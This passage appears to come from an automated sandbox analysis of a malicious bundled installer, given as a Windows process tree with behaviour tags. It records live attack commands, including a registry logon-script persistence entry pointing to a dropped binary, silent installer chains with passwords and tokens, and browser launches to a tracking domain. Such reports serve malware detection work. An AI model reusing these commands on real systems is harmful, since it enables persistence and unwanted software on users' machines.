- Suspicious use of AdjustPrivilegeToken
PID:3348 -
C:\Users\Admin\Documents\JReCxrSZ5O_Lnjfb2WaAEeOU.exe"C:\Users\Admin\Documents\JReCxrSZ5O_Lnjfb2WaAEeOU.exe"2⤵
- Executes dropped EXE
PID:968 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 968 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3392 -
C:\Users\Admin\Documents\DpLRG_KNuUytQZuMpgd6PuVG.exe"C:\Users\Admin\Documents\DpLRG_KNuUytQZuMpgd6PuVG.exe"2⤵
- Executes dropped EXE
PID:1068 -
C:\Users\Admin\AppData\Local\Temp\is-8SO3I.tmp\DpLRG_KNuUytQZuMpgd6PuVG.tmp"C:\Users\Admin\AppData\Local\Temp\is-8SO3I.tmp\DpLRG_KNuUytQZuMpgd6PuVG.tmp" /SL5="$202AE,138429,56832,C:\Users\Admin\Documents\DpLRG_KNuUytQZuMpgd6PuVG.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:3108 -
C:\Users\Admin\AppData\Local\Temp\is-OFA81.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-OFA81.tmp\Setup.exe" /Verysilent4⤵PID:3232
-
C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"5⤵PID:1296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 3006⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3628 -
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵PID:2428
-
C:\Users\Admin\AppData\Local\Temp\is-CTKNO.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-CTKNO.tmp\Inlog.tmp" /SL5="$9020C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:3872 -
C:\Users\Admin\AppData\Local\Temp\is-ODK44.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-ODK44.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵PID:1532
-
C:\Users\Admin\AppData\Local\Temp\is-0N4EO.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-0N4EO.tmp\Setup.tmp" /SL5="$20568,17367866,721408,C:\Users\Admin\AppData\Local\Temp\is-ODK44.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:7420 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-1LK48.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵PID:8060
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-1LK48.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵PID:2836
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵PID:7960
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵PID:480
-
C:\Users\Admin\AppData\Local\Temp\is-1LK48.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-1LK48.tmp\{app}\vdi_compiler"9⤵
- Executes dropped EXE
PID:3676 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 29210⤵
- Program crash
PID:6352 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵PID:1232
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=72110⤵PID:5280
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffc5c946f8,0x7fffc5c94708,0x7fffc5c9471811⤵PID:7756
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 /prefetch:211⤵PID:6788
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:311⤵PID:4396
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2636 /prefetch:811⤵PID:1488
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:111⤵PID:7444
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:111⤵PID:7272
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:111⤵PID:2792
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4544 /prefetch:111⤵
- Executes dropped EXE
PID:3032 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4456 /prefetch:811⤵PID:5092
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:111⤵PID:4124
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:111⤵PID:6392
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:111⤵PID:7736
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:111⤵PID:7956
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:111⤵PID:1708
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 /prefetch:811⤵PID:5892
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 /prefetch:811⤵PID:7940
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2040 /prefetch:211⤵PID:4092
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:111⤵PID:8164
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:111⤵PID:6612
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:111⤵PID:4052
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3044 /prefetch:811⤵PID:1684
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:111⤵
- Suspicious behavior: EnumeratesProcesses
PID:4676 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6700 /prefetch:111⤵PID:6396
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6992 /prefetch:111⤵PID:4548
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2108 /prefetch:111⤵PID:1900
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5832 /prefetch:811⤵PID:7412
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:111⤵PID:6708
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:111⤵PID:4268
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:111⤵PID:6560
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:111⤵PID:4984
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:111⤵PID:6456
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:111⤵PID:4824
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6912 /prefetch:111⤵PID:4420
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:111⤵PID:5388
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:111⤵PID:3528
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:111⤵PID:7572
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2716 /prefetch:111⤵PID:6656
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,93458240080361703,7709049361857854085,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1076 /prefetch:111⤵PID:7528
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵PID:868
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3604 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629319883 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵PID:1924
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵
- Executes dropped EXE
PID:1756 -
C:\Users\Admin\AppData\Local\Temp\is-KRIPU.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-KRIPU.tmp\WEATHER Manager.tmp" /SL5="$500BC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:3736 -
C:\Users\Admin\AppData\Local\Temp\is-EG51N.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-EG51N.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵PID:6212
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-EG51N.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-EG51N.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629319883 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵PID:2568
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
- Executes dropped EXE
PID:1300 -
C:\Users\Admin\AppData\Local\Temp\is-HKJ95.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-HKJ95.tmp\VPN.tmp" /SL5="$202B4,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4644 -
C:\Users\Admin\AppData\Local\Temp\is-3COET.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3COET.tmp\Setup.exe" /silent /subid=7207⤵PID:3356
-
C:\Users\Admin\AppData\Local\Temp\is-U9COI.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-U9COI.tmp\Setup.tmp" /SL5="$204EA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-3COET.tmp\Setup.exe" /silent /subid=7208⤵PID:4092
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "9⤵PID:5604
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090110⤵PID:4844
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "9⤵PID:5272
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090110⤵PID:4428
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall9⤵PID:968
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install9⤵PID:5604
-
C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"5⤵
- Executes dropped EXE
PID:4160 -
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
- Executes dropped EXE
PID:4140 -
C:\Users\Admin\AppData\Local\Temp\is-N35IP.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-N35IP.tmp\MediaBurner2.tmp" /SL5="$202B0,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3268 -
C:\Users\Admin\AppData\Local\Temp\is-N264C.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-N264C.tmp\3377047_logo_media.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:6032 -
C:\Program Files\Microsoft Office 15\XKPTDHPAYE\ultramediaburner.exe"C:\Program Files\Microsoft Office 15\XKPTDHPAYE\ultramediaburner.exe" /VERYSILENT8⤵PID:460
-
C:\Users\Admin\AppData\Local\Temp\is-44HHO.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-44HHO.tmp\ultramediaburner.tmp" /SL5="$402A6,281924,62464,C:\Program Files\Microsoft Office 15\XKPTDHPAYE\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
PID:2428 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:7156
-
C:\Users\Admin\AppData\Local\Temp\25-949f9-1a2-c9f94-16f32e62120fe\ZHonucywepi.exe"C:\Users\Admin\AppData\Local\Temp\25-949f9-1a2-c9f94-16f32e62120fe\ZHonucywepi.exe"8⤵PID:6356
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:7012 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffc5c946f8,0x7fffc5c94708,0x7fffc5c9471810⤵PID:4984
-
